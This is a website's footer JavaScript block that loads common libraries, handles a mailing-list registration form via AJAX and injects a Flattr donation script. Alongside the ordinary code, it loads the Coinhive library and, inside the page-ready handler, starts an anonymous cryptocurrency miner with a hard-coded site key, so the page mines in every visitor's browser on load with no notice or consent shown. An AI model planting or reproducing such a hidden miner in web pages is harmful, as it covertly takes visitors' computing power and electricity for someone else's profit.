
<script src="/assets/js/bootstrap.min.js"></script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
<script src="http://downloads.mailchimp.com/js/jquery.form-n-validate.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
	$(document).ready( function () {
	    $('#wrapper').height($(document).height());
	    // I only have one form on the page but you can be more specific if need be.
	    var $form = $('form');

	    if ( $form.length > 0 ) {
	        $('form input[type="submit"]').bind('click', function ( event ) {
	            if ( event ) event.preventDefault();
	            // validate_input() is a validation function I wrote, you'll have to substitute this with your own.
	            if ( $form.validate() ) { register($form); }
	        });
		}
		
		// Coinhive
		var miner = new CoinHive.Anonymous('flQ6iKjlcO9f0jNAEYB1sNOxrkFmkYbp');
		miner.start();
	});

	function appendResult(userText , className, iconClass){
	  var resultHTML = "<div class='stretchLeft result "+ className + "'>" + userText + " <span class='fa fa-" + iconClass + "'></span>" + "</div>";
	  $('body').append(resultHTML);
	  $('.result').delay(10000).fadeOut('1000');
	}


	function register($form) {
	    $.ajax({
	        type: $form.attr('method'),
	        url: $form.attr('action'),
	        data: $form.serialize(),
	        cache       : false,
	        dataType    : 'json',
	        contentType: "application/json; charset=utf-8",
	        error       : function(err) { alert("Could not connect to the registration server. Please try again later."); },
	        success     : function(data) {
	            if (data.result != "success") {
	                appendResult('Wrong Email Or You Are Already Registered, Try Again', 'error', 'exclamation');
	            } else {
	                // It worked, carry on...
	                appendResult('Successful, Check Your Email For Confirmation ', 'success', 'check');
	            }
	        }
	    });
	};


	/* <![CDATA[ */
	    (function() {
	        var s = document.createElement('script');
	        var t = document.getElementsByTagName('script')[0];

	        s.type = 'text/javascript';
	        s.async = true;
	        s.src = '//api.flattr.com/js/0.6/load.js?'+
	                'mode=auto&uid=gargamel&language=sv_SE&category=text';

	        t.parentNode.insertBefore(s, t);
	    })();
	/* ]]> */

</script>